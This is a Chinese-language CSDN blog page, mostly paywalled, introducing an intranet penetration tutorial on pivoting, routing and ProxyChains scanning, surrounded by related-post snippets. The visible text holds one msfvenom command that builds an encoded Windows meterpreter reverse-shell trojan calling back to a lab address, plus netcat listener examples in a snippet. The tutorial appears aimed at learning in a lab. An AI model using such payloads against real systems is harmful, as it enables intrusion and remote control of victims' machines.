内网渗透系列之Pivoting跳板攻击与自动路由的配置以及使用ProxyChains进行代理扫描并获取内网服务器权限

已于 2023-01-20 10:26:19 修改
阅读量2.2k 收藏 9
点赞数 1
分类专栏: 内网渗透 文章标签: 安全性测试 web安全 安全
于 2022-09-04 23:15:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/126681653
版权
本文详细介绍了内网渗透中的Pivoting跳板攻击,通过配置路由和使用ProxyChains进行代理扫描,以获取内网服务器权限。涉及msf反弹shell、存活主机探测、端口扫描以及如何利用内网中的跳板机进行横向移动。文章以实际操作为例,解析了路由设置、端口扫描和漏洞利用过程。
摘要由CSDN通过智能技术生成

Pivoting跳板攻击与自动路由的配置使用以及ProxyChains进行代理扫描并获取内网服务器权限

文章目录

前言

相信大家在内网渗透过程中都会遇到,进入内网后,无法访问内网页面的情况,这是我们就需要配置路由信息,访问内网页面,然后设置socks4代理进行扫描端口的信息,进而利用相关端口,利用相关的漏洞信息,进行漏洞利用,获取靶机的权限。这就是内网渗透的第一步的简单流程,当然,在后期会利用相关的工具获取密码信息,远程登录,以及权限维持和痕迹清除等操作了,我们这里主要讲的是横向移动的重要步骤之一,后续将会讲解更多关于内网渗透的知识,大家要好好复习啊。

msf反弹shell

前期我们生成了木马程序在靶机中,相关命令就不解释了,先放出来吧
木马的生成

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.231.131 lport=4444 -a x86 --platform windows -b “\x00\xff” -e x86 /shikata_ga_nai -f exe > msf.exe
(其中的-p是

了解本专栏 订阅专栏 解锁全文 超级会员免费看
炫彩@之星
关注
专栏目录
订阅专栏
内网渗透系列之真实内网环境搭建
lza20001103的博客
09-04 1875
真实内网环境搭建 文章目录真实内网环境搭建前言靶机的准备后记 前言 最近学习了内网的一些知识,学会了域的创建,域渗透以及内网渗透方面的知识,这里就简单给大家介绍一下真实内网环境的搭建过程。 靶机的准备 这里需要5台机器,分别是kali+2台防火墙+2台服务器(内网机器)其中防火墙可以去网上下载。或者可以去我的资源那里下载。其中的话,就需要3张网卡了,VM1,VM2,VM8,其中VM1和VM2是仅主机模式,VM8是NAT模式。 靶机的网卡设置如下: 网卡设置: kali(VM1)192.168.101.102
红队内网攻防渗透:内网渗透内网各种工具平台的使用
HACKONE的博客
04-10 527
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
黑客经验谈:跳板攻击入侵技术实例解析
weixin_34379433的博客
01-14 842
 网络入侵,安全第一,一个高明的入侵者,不会冒然实行动. 他们在入侵时前会做足功课,入侵时会通过各种技术手段保护自己,以防被对方发现,引火烧身. 其中,跳板技术是攻击者通常采用的技术. 下面笔者结合实例,解析攻击入侵中的跳板技术. 1. 确定目标 攻击者在通过扫描工具进行定点(IP)扫描或者对某IP段扫描的过程中发现了该系统(服务器)的某个漏洞,然后准备实施攻击. 比如,笔者通过对...
proxychains代理扫描获取内网服务器权限
weixin_45007073的博客
03-25 3215
Proxychains Proxychains是为了GNU\Linux操作系统而开发的工具,任何TCP连接都可以通过TOR或者SOCKS4,SOCKS5,HTTP/HTTPS路由到目的地。在这个通道技术中可以使用多个代理服务器。除此之外提供匿名方式,诸如用于中转跳板的应用程序也可以用于对发现的新网络进行直接通信。 利用思路 ...
渗透测试
yes_angel的博客
06-25 2566
渗透测试工具 网络扫描工具、通用漏洞检测、应用漏洞检测三类 网络扫描工具 1.  系统自带工具: 2. NMap 3. SuperScan 4. Wireshark:通常被用于嗅探局域网内的数据传输格式,探查是否存在明文传输口令、数据传输风险等 通用漏洞扫描工具 通用漏洞主要指操作系统本身或者安装的应用软件所存在的漏洞,通常是指缓冲区漏洞,例如MS-08-067、MS-12
内网扫描工具
09-25
#网络资产信息扫描 在渗透测试(特别是内网)中经常需要对目标进行网络资产收集,即对方服务器都有哪些IP,IP上开了哪些端口,端口上运行着哪些服务,此脚本即为实现此过程,相比其他探测脚本有以下优点:1、轻巧简洁,只需python环境,无需安装额外外库。2、扫描完成后生成独立页面报告。 此脚本的大概流程为 ICMP存活探测-->端口开放探测-->端口指纹服务识别-->提取快照(若为WEB)-->生成结果报表 运行环境:python 2.6 + 参数说明 -h 必须输入的参数,支持ip(192.168.1.1),ip段(192.168.1),ip范围指定(192.168.1.1-192.168.1.254),ip列表文件(ip.ini),最多限制一次可扫描65535个IP。 -p 指定要扫描端口列表,多个端口使用,隔开 例如:22,23,80,3306。未指定即使用内置默认端口进行扫描(21,22,23,25,53,80,110,139,143,389,443,445,465,873,993,995,1080,1723,1433,1521,3306,3389,3690,5432,5800,5900,6379,7001,8000,8001,8080,8081,8888,9200,9300,9080,9999,11211,27017) -m 指定线程数量 默认100线程 -t 指定HTTP请求超时时间,默认为10秒,端口扫描超时为值的1/2。 -n 不进行存活探测(ICMP)直接进行扫描。 结果报告保存在当前目录(扫描IP-时间戳.html)。 例子: python NAScan.py -h 10.111.1 python NAScan.py -h 192.168.1.1-192.168.2.111 python NAScan.py -h 10.111.1.22 -p 80,7001,8080 -m 200 -t 6 python NAScan.py -h ip.ini -p port.ini -n 服务识别在server_info.ini文件中配置 格式为:服务名|默认端口|正则 例 ftp|21|^220.*?ftp|^220- 正则为空时则使用端口进行匹配,否则以正则匹配结果为准。 项目地址 https://github.com/ywolf/ 欢迎大家反馈建议和BUG
kali中用proxychains代理后的nmap扫描问题
隐身博客
12-19 1131
注意:nmap扫描过程中,由于网络连接的不稳定性,可能会导致代理服务器连接中断。如果遇到连接中断的情况,可以尝试重新启动代理服务器或更换其他可用的代理服务器。启动代理服务器:根据你使用代理服务器不同,启动代理服务器。常用的代理工具有SOCKS代理如SS5、Shadowsocks等。是你所使用代理服务器的端口号。是nmap扫描选项,
156-160.网络安全渗透测试—[Cobalt strike系列]—[域内渗透/信息收集/本地管理员/远程命令执行文件操作/Mimikatz/登录认证/自动化横向渗透/socks代理/中转监听器]
qwsn
04-02 1843
一、Cobalt Strike域内渗透 1 实验环境 1.1 实验拓扑 1.2 环境搭建 1.2.1 关闭各自域内防火墙 1.2.2 配置DC组策略:自动化让域用户加入到各自客户端的本地管理员组 1.2.3 DC组策略配置不当导致的权限问题:其他域用户获取本地管理员权限 1.2.4 WinRM 服务的配置不当导致的问题:在权限允许下可远程执行脚本命令 1.2.5 Win7虚拟机设置不休眠不关闭显示器:防止自动挂起导致的会话关闭 2 实验1:获取webserver跳板机会话+通过webserver的smb会话
渗透测试 ( 5 ) --- 扫描之王 nmap、渗透测试工具实战技巧合集
墨鱼菜鸡
07-11 5896
Nmap 官方文档 ( 中文文档是 Nmap 版本4.50,英文文档是最新的): 英文文档:https://nmap.org/book/man.html中文文档:https://nmap.org/man/zh/index.html#man-description官方 Nmap 项目指南:https://nmap.org/book/toc.html ...
内网初步探测与扫描
辉小鱼的博客
11-17 495
内网初步探测与扫描内网初步探测与扫描使用Nmap对内网进行初步探测与扫描
扫描工具大合集,包括代理、IP、端口、目录等扫描
03-25
扫描工具大合集,包括代理、IP、端口、目录等扫描
proxychains
qq_43668007的博客
02-24 1506
proxychains
内网隐蔽扫描:让你的nmap扫描无影无踪(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_0011的博客
07-09 1441
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…在内网渗透测试中,隐蔽扫描是至关重要的。技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
proxychains 安装和proxychains 代理nmap
qq_53086690的博客
12-07 7685
目录1.下载源码2.编译安装3. 配置proxychains 1.下载源码 首先我们要从github上把源码拉取到本地 git clone https://github.com/haad/proxychains.git 2.编译安装 cd proxychains ./configure make sudo make install 如果出现make: cc: Command not found错误 这是由于安装的Linux系统没有安装gcc环境,需要安装gcc yum install gcc 3. 配置p
nc(瑞士军刀)的使用 kali配置源 netcat介绍 nmap简介 proxychains配置代理
anananajiushiwo的博客
07-07 1909
进入root权限,输入: (4条消息) kali安装及更换源(详解)_ter_ret的博客-CSDN博客_kali换源https://blog.csdn.net/qq_53030229/article/details/120414259输入签名: 输入apt-get updatenc可以侦听,传输模式nc -h可以查看用法1.实现连接通讯服务端 监听端口 nc -lnvp 99992.nc安装tar -zxvf netcat-0.7.1.tar.gzcd netcat-0.7.1.tar.gz查看是否有
Nmap扫描原理与用法
贝隆的博客
02-02 1309
map扫描原理与用法
使用proxychains代理,利用nmap扫描报错解决办法】
热门推荐
AA8j的博客
11-22 6万+
使用 proxychains nmap -sV 39.156.66.14 命令时,报错: [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.14 Starting Nmap 7.91 ( https://nmap.org )
nmap使用
weixin_46273733的博客
06-28 351
目录   nmap简介 nmap常用命令 实例演示-发现主机 实例演示-端口发现 实例演示-获得服务版本详细信息 实例演示-确定主机操作系统   nmap简介 nmap是一款非常强大的主机发现和端口扫描工具,而且nmap运用自带的脚本,还能完成漏洞检测,同时支持多平台。 nmap常用命令 主机发现  iR               &nb...
nmap使用nps的socks5模式端口扫描问题
whojoe的博客
11-23 2902
nmap使用nps的socks5模式端口扫描问题前言代码查看 前言 在使用nmap挂nps的socks5时候 proxychains nmap -Pn -sT 127.0.0.1 -p 99 会扫任何端口都打开 socks5认证部分请参考 socks5认证过程 代码查看 在nps\server\proxy\socks5.go中 首先打开start,调用handleConn //start func (s *Sock5ModeServer) Start() error { return conn.NewT
改进的Ball Pivoting算法:非均匀点云数据重建与优化
本文探讨了一种改进的Ball Pivoting算法,针对散乱点云数据的重建问题。Ball Pivoting算法原本是一种广泛应用于三维几何建模中的表面重建技术,其基本思想是通过从一个种子三角形出发,球体沿着三角形的一边旋转,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值